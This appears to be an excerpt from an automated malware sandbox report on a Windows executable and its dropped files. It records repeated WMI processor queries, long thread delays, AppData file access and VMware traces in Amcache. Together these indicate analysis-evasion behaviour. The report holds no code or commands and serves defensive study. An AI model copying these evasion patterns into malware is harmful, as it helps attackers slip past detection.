Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 58999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199955	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1198910	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599777	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59867	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59529	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59287	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598652	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59840	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59733	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59379	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59261	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597543	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 59859	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
